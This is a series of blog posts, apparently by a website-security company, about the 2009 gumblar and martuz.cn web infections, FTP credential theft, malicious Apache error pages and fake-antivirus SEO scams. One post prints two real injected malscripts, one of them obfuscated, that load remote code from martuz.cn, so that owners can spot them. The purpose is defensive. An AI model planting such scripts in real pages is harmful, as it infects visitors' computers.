By

The Blame Game

Major Malware Outbreaks Evade Anti-Virus Protection

A report released on July 14, 2009 states that “Several successive and massive malware outbreaks caused a spike in malware that was undetected by major AV engines.”

In Commtouch’s Q2 Report available here , which covers the analysis of over 2 billion emails and Internet transactions, they also claim:

  • “Business” was the website category most infected with malware
  • An average of 376,000 new zombies were activated each day with malicious intent

Amir Lev, Chief Technology Officer of Commtouch said that for the last 18 months anti-virus (AV) engines used many generic signatures, which were effective at blocking malware. However, malware writers and distributors introduced new variants which are immune to these generic signatures.

This time period coincides with the infection of 1,000s of websites with gumblar, martuz and iframe malscripts which then received Google’s moniker of “This site may harm your computer.”

The Blame Game

Answering many, many blog and forum postings from disgruntled website owners and developers who’ve been the victim of these recent gumblar, martuz and iframe infections, it’s been our experience that quite often the thought process of the victimized website owner follows this path:

  1. The website owner or webmaster receives an email from Google notifying them that their site is infectious. Google rarely (if ever) is wrong so they immediately slap all SERPs (Search Engine Result Pages) with the “This site may harm your computer” label thereby stopping all traffic dead in it’s tracks.
  2. Cautiously the site owner or webmaster will try to view the site. They don’t want to become infected from their own site, but their curiosity is overwhelming. They typically don’t see anything malicious.
  3. “How do I find and clean this?” Often these people will post questions on sites like Google’s Webmaster Forums or www.badwarebusters.org or some other favorite online watering hole.
  4. Then their focus turns to, “Who’s to Blame?”

The feeling of many site owners is one of “I’ve been violated and I need to blame someone.”

When hacking victims get to “Who’s to blame”, they quite often turn their attention to their hosting provider. Many times the blogs and forums are filled with postings where people blame even some of the largest hosting providers. Site owners want to instantly spend the time and money to move their website to a different hosting provider where they’ll once again feel safe and secure.

All because they feel it’s the hosting provider’s fault their site, or sites, were hacked.

The site owner or developer will call the hosting provider looking for assistance from their technical staff and quite frequently, they can’t find the obfuscated malscript buried deep inside some harmless HTML code either. Many times the website has been blocked by various anti-virus programs, Google’s search results and sometimes even corporate website filters for days or weeks before the issue is resolved.

Even if the site owner goes through the trouble of moving to a new hosting provider, with these recent infections, their site will just get hacked again and again.

Then who’s to blame? The new hosting provider? How many more hosting provider’s will the site owner move to until they finally find one that gives them that safe and secure feeling?

Many site owner’s want the hosting provider to take responsibility and clean their site. After all, they’re paying their $5 – $10 per month so the hosting provider should take responsibility and the spend the time to clean the infectious website, right? No matter how many times the site gets re-infected.

Don’t Shoot the Messenger

I hate to be the one to break it to you, but, hosting providers had nothing to do with websites getting hacked with the recent gumblar, martuz or iframe injections. It was anyone’s fault but theirs.

It could be the site owner’s fault, or the anti-virus company’s fault, or Microsoft’s fault, or the fault of the company that wrote the FTP software being used.

It was almost anyone’s fault – except that of the hosting provider.

Let me explain.

You see, with all the malware that went undetected by these generic signatures, thousands of PCs were compromised. According to the Commtouch report referenced above, 376,000 new zombies per day.

You could blame Microsoft, however, the Commtouch report also shows an increase in the amount of Mac malware as well. Besides, blaming Microsoft is so 2,000 late.

These recent website infections came from viruses on the PCs of people who have FTP access to websites.

OMG!

Does that mean it could be the fault of the website owners, developers and webmasters?

It might, rabbit, it might.

These recent undetectable viruses steal FTP credentials – usernames and passwords. These viruses search through the files of popular FTP software looking for the file with the stored FTP credentials. These viruses also record keystrokes so when an infected PC is used to type in the FTP credentials, they get stolen. As another point of attack the viruses also “sniff” FTP traffic. Since FTP transmits all data in plain text, it’s easy for a sniffer to see the username and password in the FTP data stream and steal it. We even did a video to show how easy it is to sniff FTP traffic. It’s so easy that some people use a sniffer on their own FTP traffic if they forgot their stored password. Here’s our video.

Virus writers are incredibly smart and this round of malware proves it.

Once the virus has the FTP credentials it sends them to the server of a cybercriminal. This server is configured to login to the website as a valid user, inject it’s infectious code and move on to the next site.

Who’s to Blame?

How many websites did you visit that displayed some type of ad? Did you know that many ad networks have served up infectious ads – unknowingly of course, but nonetheless, the ads could have infected many visitors.

How many websites did you visit that displayed Flash intro’s or allowed you to view an Adobe Acrobat file (pdf)? Adobe had a few vulnerabilities in their software, that were exploited during and prior to this time period. Combine a vulnerability in files so widely used with the ineffective generic anti-virus signatures, and there’s another source to blame. Maybe two new sources – the AV companies and Adobe.

Did you update your Adobe products as soon as the update was available?

If not, then there’s another person to blame – you.

Could the companies that wrote the FTP software used, maybe have encrypted the stored usernames and passwords so that it wasn’t quite so easy to find and steal the FTP credentials? There’s anothe source to blame.

Maybe if so many people didn’t use their PCs with full administrator rights, there wouldn’t be such a virus outbreak in the first place. Maybe these PC owners are to blame.

Whoever you decide to blame, don’t incur the costs involved with moving to a new hosting provider before you find out what your site was infected with and how those infections occurred. You might be barking up the wrong tree.

I’ll tell you, the cybercriminals are to blame.

They’re the people who write and distribute viruses, malware and malscripts.

Cybercriminals (some call them hackers) want to control as many computers as they possibly can. They don’t care if it’s a computer for a university or if it’s the computer of a new Internet start-up company. One compromised computer looks just the same as another.

Compromised computers make up their inventory.

You know what a hacker calls an uninfected computer – opportunity!

Their digital assets are the computers they control. Often times some of their inventory of infected computers gets rented out to other cybercriminals. This provides them with a source of income.

If you really need to blame someone, blame the hackers, or the international cyber laws, or the world economy. Just don’t blame the hosting providers.

Hosting providers provide a very valuable service. Their margins are squeezed tighter and tighter as it seems everybody thinks it’s a great idea to enter the hosting industry. The good hosting providers work hard for their customers. They depend on customer retention and acquisition – just like every other business. They do the best they can with what they have.

The only thing a hosting provider could do to prevent these gumblar, martuz and iframe infections is to block all FTP traffic. Then you would have a very good reason to blame them for something, but you still wouldn’t be able to justify blaming them for the rash of website infections.

It simply isn’t their fault.

Let me know your thoughts on this. Who would you blame if your site got hacked? Who did you blame if your site was already hacked?

By

New Website Infection Method

Working with a website owner recently, we came across a new method of delivering infectious code (drive-by downloads) – at least it’s a method we’ve never seen before.

The scenario: Website owner gets the email from Google telling them their website is serving up malscripts to visitors and adds “This website can harm your computer” to all their SERPs. The website owner can’t find the malscript anywhere.

We scan their site and find nothing. Our scanning spiders their site, all links and even spiders the sites they link to.

Someone from another vendor says they found malware on a webpage that we didn’t even see. I start screaming “Why didn’t we find this page?” We try to manually download the page and we get a 404 error – page not found.

Turns out, the page didn’t even exist. We try to access the non-existent webpage with a sandboxed browser (sandboxed means it’s a system that can’t be infected due to all the security measures we’ve taken. It also records any attempted file changes, registry changes, etc.).

Bam! We see in the 404 error page that there’s some redirect code in there trying to access martuz.cn. Interesting.

We look at the address bar in our browser and see that it didn’t redirect to a custom 404 error page, it still shows the URL we typed in with the john_doe.html page at the end. We know from our scan that this client is running their website on an Apache 2.0 server.

Our research showed that in the Apache installation folder under a sub-folder of “error”, the HTTP_NOT_FOUND file had been modified and the malscript added.

Which begs the question, why would a cybercriminal go through all that trouble to only deliver the martuz.cn malscript to people who type in a non-existent webpage?

Not sure on that one.

We also found these files had been added to the default directory on the webserver:

  • bad_gateway.html
  • bad_request.html
  • forbidden.html
  • internal_server_error.html
  • method_not_allowed.html
  • not_acceptable.html
  • not_found.html
  • not_implemented.html
  • precondition_failed.html
  • proxy_authentication_required.html
  • request-uri_too_long.html
  • unauthorized.html
  • unsupported_media_type.html

Each of these pages looked like the default Apache error pages but with the martuz.cn malscript inserted between the closing HEAD tag and the opening BODY tag.

We found that Apache uses one of 4 options when handling error responses:

  1. output a simple hardcoded error message
  2. output a customized message
  3. redirect to a local URL-path to handle the problem/error
  4. redirect to an external URL to handle the problem/error

It didn’t appear to be redirecting as the URL in the address bar was still what we had entered. So we eliminated options 3 & 4.

At first when we saw the malscript only being delivered with 404 responses, we thought that maybe there must be some line in the httpd.conf file like:

ErrorDocument 404 /404.html

But there was no such entry in the httpd.conf file. It was definitely the default Apache error page with the martuz malscript inserted.

Further investigation found our theory was correct.

Lesson: When trying to find all the infectious pages on your site, don’t overlook the non-existent webpages as well. In this particular case, those were the only files serving infectious code.

By

How To Find martuz.cn in Websites

After our post earlier today about how martuz.cn is the new domain for gumblar infections, we’ve received hundreds of emails from people (I guess too embarassed to post their question in an open forum), asking how to find martuz.cn in websites.

We’ll use a utility program called wget. Wget allows you to download the “raw” webpage from a site. It’s used quite heavily in the Linux world, but there is also a version for Windows users.

You can download wget from here: http://gnuwin32.sourceforge.net/packages/wget.htm

I recommend you select the Complete Package, except sources.

Download it, install it – you can just accept all of the defaults.

Now open a command prompt (Start->Run->cmd->OK).

Change directories like this: cd \”Program Files\GnuWin32\bin” <enter>

Let me explain a little about the options we’ll use with wget.

Sometimes these infectious malscripts like martuz.cn will only show themselves when viewed with a specific browser. In the recent days, martuz.cn won’t activate if you visit one of their infectious websites with Google Chrome as your browser. To be sure, we’ll set our user agent (which is what gets checked for your current browser) to Internet Explorer on a Windows XP computer.

Other times infectious malscripts like martuz.cn or certain variations of gumblar.cn will only try to infect a visitor’s PC if the visitor is coming to the infectious site from a Google search. In that case we would need to set “referer” to Google’s home page.

Here’s how we do it with wget. You would enter this in your command prompt:

wget –user-agent=’Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)’ –referer=http://www.google.com http://www.yoursitehere.com

Obviously you would change the http://www.yoursitehere.com with your webpage. For instance, if your website is http://www.joesbarandgrill.com you would simply use the above command but with http://www.joesbarandgrill.com in place of http://www.yoursitehere.com

This will download your homepage into the current directory on your PC.

If your site has already been indexed by Google and found to have infectious webpages, you can use this Google search to find out which pages Google has found malscripts on.

site:yoursitehere.com

The Search Engine Results Pages (SERPs) will show you each page from your site and any pages that Google thinks has malscripts on them will display their warning “This site may harm your computer”.

You should use wget for each page that Google lists as hosting malscripts by providing the complete URL in the wget command line.

For instance, if you have a webpage contactus.html and it’s listed in Google SERPs as hosting malscripts, then you would use this wget command:

wget –user-agent=’Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)’ –referer=http://www.google.com http://www.yoursitehere.com/contactus.html

That will download contactus.html into your current directory and you would scan that for any malscripts.

Now that you have downloaded your webpages into your current directory, you can begin the process of searching through the files.

While at your command prompt type in:

edit index.html

Then use search->find and type in the word: mart

The reason you don’t search for martuz.cn is that the cybercriminals know that would make it too easy for you to find. Their script (one of them we’ve found) looks like this:

var a="Script Engine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.w rite("<script src=//mar tu"+"z.cn/vid/?id="+j+"><\/script>");}

So you can see that if you were to scan for martuz, you’d never find it because their malscript uses string concatentation to “build” martuz.cn (martu + z.cn)

Here’s another martuz script we found:

(f u n c t i o n(){var G33z1='%';var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();

If you look at this second malscript you won’t find martuz or mart or any other text even close to the first malscript. If you find any script like this in your downloaded webpages, more than likely your site is serving infectious code. This is an example of the steps cybercriminals will go through to obfuscate their malscripts.

You’ll have to scan through each file on your website in order to see if you have any martuz.cn infections. If you do find them, you should scan your PC for any viruses with AVG, Avast or Malwarebytes, clean it, change the FTP password to your site and upload your last known, good backup. You do have a backup right?

We are working on a video to show you how to move away from FTP and use SSH/SCP instead, but we’re not quite ready with it yet.

If you subscribe to this blog, you’ll get an update when it’s ready.

Thank you. We hope you found this useful. If you have any questions, please email us or post your comments below.

By

New Domain – Same Damage

If you have a website, you may have had your website attacked by cybercriminals using the Gumblar.cn hack.

This hack was responsible for thousands of websites serving infectious code to their visitors.

However, the domain that was hosting further links to malicious downloads was gumblar.cn however, that domain has been shutdown and now many of the newer infections are using martuz.cn as their primary malicious download domain.

What the new code does is check to see if you are visiting using the Google Chrome browser on Windows XP and your browser is set to allow cookies.

I think, the reason behind this is to prevent the automated scanners from finding their infectious code. Many scanners don’t try different user agents, referers or allow cookies. This prevents them from finding these new malscripts.

We’ve even seen where sites had their robots.txt file modified and only the webpages that were serving up malscripts were inserted into the robots.txt so Google wouldn’t index them.

This all points to the fact that many people rely on Google to check their site for malscripts. Google will of course post their moniker “This site may harm your computer” on all of the Search Engine Result Pages (SERPs) and browsers like Google Chrome and Firefox will alert all visitors to the infectious website of it’s malware intentions. This typically will create a desire in some to notify the site owner who then goes into recovery mode to clean their site.

You can’t just scan your sites for any line that contains martuz.cn as the script files being inserted have obfuscated the domain name so it must be concatenated in order to see it. The malscripts are inserted into .htm, .html, .asp, .aspx, .js and .php files.

The cybercriminals have been very clever at disguising their malscripts.

It still appears that the way the cybercriminals gain access to websites is through a virus on the system that uploads to the website. This virus doesn’t seem to be detectable by many of the more popular anti-virus programs. We’ve worked with thousands of site owners, many of them had Norton or McAfee and they weren’t able to detect the virus.

We’ve been recommending AVG or Avast or Malwarebytes. These seem to find the virus after many scans with other anti-virus programs failed.

We also recommend getting away from FTP. We’re putting together some video instructions on the why’s and how’s of moving away from FTP. We’ll post here when we have them ready. It should be later this week.

Until then, watch your websites for any changes. It’s the only way.

By

Halloween Costumes and SEO

Not to be left out of the upcoming festivities, hackers are using SEO to infect more people with their fake Anti-virus programs.

For the past week we’ve been monitoring 2 current events – Halloween and the financial crisis.

What we’ve seen is that hackers are infecting legitimate websites that show up in the SERPs when “halloween costume” is the the search term. Their infection includes some javascript that does a silent redirect to one of their websites which falsely shows the visitor that their computer might be infected and they should download “their” anti-virus software to improve the speed of the visitor’s computer.

The thing is, the infection of the legitimate website is a silent redirect that actually includes the keywords optimized for high SE rankings. So the hacker is actually making the infected webpage rank higher in the search engines. They actually use common SEO techniques to attract more people to their infectious webpages.

Another thing we’ve seen and has been confirmed by Panda Labs is the correlation between down days in the stock market and the amount of new malware released. As the market dips, the number of infectious files increases. We’ve been noticing this on our honeypots (computers we leave open on the Internet hoping they’ll get infected so we can further analyze the infection)

This kind of runs parallel with the halloween costume scenario. What the hackers are doing during the dips in the market are making “available” their rogue (read fake) anti-malware software via various infected webpages.

Instead of going after banking logins and other such useful information they’re (the hackers) interested in “legitimitizing” their business by selling their rogue anti-malware. First they have to convince the visitor that their computer is infected, then they offer an immediate solution.

Ingenious!

Following standard marketing strategies, the hackers are actually making the visitor aware of a need and then offering a quick solution – for $60.

According to Panda Labs, they estimate that this marketing strategy has made the hackers approximately $14 million a month. I’m not sure I follow their math, but regardless, the hackers are making money.

I believe that the financial crisis is creating more fear about identity theft and therefore making this strategy more effective during the down cycles in the market.

Just so you know, our honeypots are fed popular keywords based on current events and then they visit the resulting webpages, record the activity and that’s what we base our information on.

It’s a fun way of spying on the hackers and it’s what we use in our securitiy appliance “The Box” to blacklist websites and malicious code. It’s what we use in WeWatchYourWebsite to find malicious code. We then search all of our clients websites looking for this malicious code. If any is found, we alert them immediately.

Be careful out there. It’s getting real nasty.

By

Are you really safe online?

According to a recent report by McAfee, here are some extremely interesting statistics:

  • 92% of users surveyed believed their anti-virus software was up to date, but only 51% had updated their anti-virus software within the past week
  • 73% of users surveyed believed they had a firewall installed and enabled, yet only 64% actually did
  • About 70 % of PC users believed they had anti-spyware software, but only 55% actually had it installed
  • 25% of users surveyed believed they had anti-phishing software, but only 12% actually had the software
  • 42% of businesses surveyed dedicate just one hour a week to proactive IT security management, despite the fact that 21% acknowledged an attack could put them out of business
  • 44% of businesses surveyed think cybercrime is only an issue for larger organizations and does not affect them
  • 52% of businesses surveyed believe that because they are not well-known, cybercriminals will not target them
  • 45% of businesses surveyed do not think they are a “valuable target” for cybercriminals
  • 46% of businesses surveyed do not think they can be a source of profit for cybercriminals

Interesting aren’t they?

If you’re a member of the 51% who had updated their anti-virus software within the past week, then you should read Secunia’s information after they tested 12 security suites. In their report it states that after testing 12 major security suites with 300 different exploits one suite blocked more than
10 times more than the next closest competitor – and it only blocked 64 out of the 300!

Here’s their report: http://secunia.com/gfx/Secunia_Exploit-vs-AV_test-Oct-2008.pdf

Do a Google search using “evading anti-virus”. In the SERPs you’ll see tutorials on how to make a virus, trojan or worm undetectable by current anti-virus software. There are specific steps.

Here’s an article about how one strain of worm was undetectable: http://arstechnica.com/news.ars/post/20080408-new-kraken-worm-evading-harpoons-of-antivirus-programs.html

In the darker forums where we lurk as part of our security research, we’ve seen numerous “how to’s” on evading detection. Many of them are so simple that anyone with just a little computer knowledge could create their own undetectable virus.

Many of the cybercriminal “mobs” offer to recreate their malware if you buy it and then find that it’s detectable by anti-virus software.

If you’re one of the 64% that actually had a firewall installed, how was it configured? If you’re like most people, you have the default firewall settings and you never, ever read the logs to see how people are trying to get in. Most of the people we’ve talked with reply by saying, “My firewall has logs?”

Has you firewall ever been tested? I guarantee it has been by a hacker, but have you ever had it tested? Have you had a security scan performed on your firewall? In the security world, we believe that an untested firewall is no security at all.

If you’re one of the 21% that acknowledged an attack could put you out of business and you only spend 1 hour a week in proactive security management, I’d like to say you’ll get what you deserve but that would be rude and a little – “in your face”.

The fact is, you could be “hacked” right now and you wouldn’t even know it. Maybe an attack wouldn’t put you out of business, but I’m sure it will cost you a lot more than preventative security management
would have cost you.

In risk management, isn’t it true that if prevention costs you less than the potential problem, it becomes a no-brainer to move forward with the prevention?

If you’re one of the 44% of businesses that think cybercrime is only an issue for larger organizations, I have to ask you this, “Where do you think most of the attacks on larger organizations is launched from?” The answer: hacked systems in smaller organizations.

If you’re one of the 52% of businesses that believe since you’re not well-known cybercriminals will not target you, I will tell you to Google the term, “security through obscurity”, or “security by obscurity”. Read everything you can about your adopted security strategy.

Cybercriminals find “hackable” computers by scanning IP addresses. Yes, sometimes, they will target a specific site, but generally, they just look for computers that have openings.

If you’re one of the 45% or 46% who think you’re not valuable to a cybercriminal, answer me this, “Do you turn your back on smaller sources of income?”

Hackers hack for money. Gone are the days when they would hack strictly to create havoc. They now make money from their craft. In some cybergangs, it’s believed that the money they make from one income stream is $150,000,000 (that’s right million).

Just as you might find every email address on your list valuable, they too find every computer that they control valuable. To you, the money is in the list. To cybercriminals, the money is in their botnet (their network of remotely controlled computers). Every controlled computer, whether a server or a PC,
is important to them.

I still find that one of the easiest ways for hackers to deface or hack a website is by logging in as you. They infect as many computers as possible. Then when you login to your website, they record your credentials and then just login as you. It’s that simple. How do they find your computer to infect it in the first place?

They don’t know who you are or where you live. They just hack as many computers as they can and the odds are, with so many people starting web based businesses, that some of the computers they infect will belong to people who own one or more websites.

It really is that simple.

If you still think you’re safe online, then keep doing what you’ve always done and you’ll keep getting what you’ve always gotten – whether you know it or not.

That’s a fact.

If you disagree, please tell me your comments.